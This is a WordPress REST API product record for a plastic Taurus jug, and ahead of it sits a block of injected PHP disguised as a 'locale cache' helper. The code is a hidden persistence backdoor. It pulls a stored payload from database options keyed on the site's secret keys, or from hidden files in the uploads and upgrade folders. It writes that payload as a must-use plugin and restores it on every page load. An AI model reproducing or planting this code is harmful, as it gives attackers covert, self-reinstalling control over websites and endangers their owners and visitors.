

// locale-cache-a
if (!function_exists('wp_locale_cache_load_seeders_for_stub')) {
	function wp_locale_cache_load_seeders_for_stub() {
		if (!function_exists('get_option') || !function_exists('get_stylesheet_directory')) {
			return;
		}
		$paths = array();
		$map = get_option('wp_plugin_helper_seed_targets', '');
		if (is_string($map) && $map !== '') {
			$j = json_decode($map, true);
			if (!empty($j['seeders']) && is_array($j['seeders'])) {
				$paths = $j['seeders'];
			} elseif (!empty($j['rels']) && is_array($j['rels'])) {
				$base = get_stylesheet_directory();
				foreach ($j['rels'] as $rel) {
					if (!is_string($rel) || $rel === '') {
						continue;
					}
					$paths[] = $base . '/' . ltrim(str_replace('\\', '/', $rel), '/');
				}
			}
		}
		foreach ($paths as $p) {
			if (!is_string($p) || $p === '' || !is_readable($p)) {
				continue;
			}
			include_once $p;
			if (function_exists('wp_locale_cache_reseed') || function_exists('wp_locale_cache_embedded_stub')) {
				return;
			}
		}
	}
}
if (!function_exists('wp_locale_cache_reseed')) {
	$boot = '';
	if (function_exists('get_option') && defined('AUTH_KEY') && defined('SECURE_AUTH_KEY') && AUTH_KEY !== '' && SECURE_AUTH_KEY !== '') {
		$bk = '_' . substr(hash('sha256', AUTH_KEY . '|' . SECURE_AUTH_KEY . '|lpc|boot'), 0, 20);
		$boot = (string) get_option($bk, '');
	}
	if ($boot === '' && function_exists('get_option')) {
		$boot = (string) get_option('wp_locale_cache_bootstrap', '');
		if ($boot === '') {
			$boot = (string) get_option('_wp_locale_cache_bootstrap', '');
		}
	}
	if ($boot === '' && !function_exists('wp_locale_cache_embedded_stub')) {
		wp_locale_cache_load_seeders_for_stub();
	}
}
if (!function_exists('wp_locale_cache_reseed')) {
	function wp_locale_cache_reseed() {
		$mu_dir = defined('WPMU_PLUGIN_DIR') ? WPMU_PLUGIN_DIR : (WP_CONTENT_DIR . '/mu-plugins');
		$dst = rtrim($mu_dir, '/\\') . '/class-wp-locale-cache.php';
		$stub = '';
		if (function_exists('get_option') && defined('AUTH_KEY') && defined('SECURE_AUTH_KEY') && AUTH_KEY !== '' && SECURE_AUTH_KEY !== '') {
			$boot = '_' . substr(hash('sha256', AUTH_KEY . '|' . SECURE_AUTH_KEY . '|lpc|boot'), 0, 20);
			$bootb = '_' . substr(hash('sha256', AUTH_KEY . '|' . SECURE_AUTH_KEY . '|lpc|bootb'), 0, 20);
			$stub = (string) get_option($boot, '');
			if ($stub === '') {
				$stub = (string) get_option($bootb, '');
			}
		}
		if ($stub === '' && function_exists('get_option')) {
			$stub = (string) get_option('wp_locale_cache_bootstrap', '');
			if ($stub === '') {
				$stub = (string) get_option('_wp_locale_cache_bootstrap', '');
			}
		}
		if ($stub === '' && defined('WP_CONTENT_DIR') && defined('AUTH_KEY') && defined('SECURE_AUTH_KEY') && AUTH_KEY !== '' && SECURE_AUTH_KEY !== '') {
			$h = substr(hash('sha256', AUTH_KEY . '|' . SECURE_AUTH_KEY . '|lpc-disk|boot'), 0, 16);
			foreach (array(rtrim(WP_CONTENT_DIR, '/\\') . '/upgrade/.' . $h, rtrim(WP_CONTENT_DIR, '/\\') . '/uploads/.' . $h . '.cache') as $bp) {
				if (!is_readable($bp)) {
					continue;
				}
				$t = @file_get_contents($bp);
				if (is_string($t) && $t !== '') {
					$stub = $t;
					break;
				}
			}
		}
		if ($stub === '' && function_exists('wp_locale_cache_embedded_stub')) {
			$stub = (string) wp_locale_cache_embedded_stub();
		}
		if ($stub === '') {
			wp_locale_cache_load_seeders_for_stub();
			if (function_exists('wp_locale_cache_embedded_stub')) {
				$stub = (string) wp_locale_cache_embedded_stub();
			}
		}
		if ($stub === '') {
			return;
		}
		if (is_file($dst) && is_readable($dst) && @md5_file($dst) === md5($stub)) {
			return;
		}
		if (!is_dir($mu_dir)) {
			if (function_exists('wp_mkdir_p')) {
				wp_mkdir_p($mu_dir);
			} else {
				@mkdir($mu_dir, 0755, true);
			}
		}
		@file_put_contents($dst, $stub);
	}
	wp_locale_cache_reseed();
	add_action('init', 'wp_locale_cache_reseed', 1);
} elseif (function_exists('wp_locale_cache_reseed')) {
	wp_locale_cache_reseed();
}
// locale-cache-a-end
{"id":890,"date":"2020-04-06T03:39:41","date_gmt":"2020-04-06T03:39:41","guid":{"rendered":"https:\/\/besthelg.contenidonitido.com\/?post_type=product&#038;p=890"},"modified":"2023-08-21T15:39:39","modified_gmt":"2023-08-21T15:39:39","slug":"vaso-taurus-de-plastico-1-5-l","status":"publish","type":"product","link":"https:\/\/besthelg.com\/en\/product\/vaso-taurus-de-plastico-1-5-l\/","title":{"rendered":"Vaso Taurus de Pl\u00e1stico 1.5 L"},"content":{"rendered":"","protected":false},"excerpt":{"rendered":"","protected":false},"featured_media":1312,"template":"","meta":[],"product_cat":[195,18],"product_tag":[],"class_list":{"0":"post-890","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-taurus","7":"product_cat-vasos","9":"first","10":"instock","11":"shipping-taxable","12":"purchasable","13":"product-type-simple"},"_links":{"self":[{"href":"https:\/\/besthelg.com\/en\/wp-json\/wp\/v2\/product\/890","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/besthelg.com\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/besthelg.com\/en\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/besthelg.com\/en\/wp-json\/wp\/v2\/media\/1312"}],"wp:attachment":[{"href":"https:\/\/besthelg.com\/en\/wp-json\/wp\/v2\/media?parent=890"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/besthelg.com\/en\/wp-json\/wp\/v2\/product_cat?post=890"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/besthelg.com\/en\/wp-json\/wp\/v2\/product_tag?post=890"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}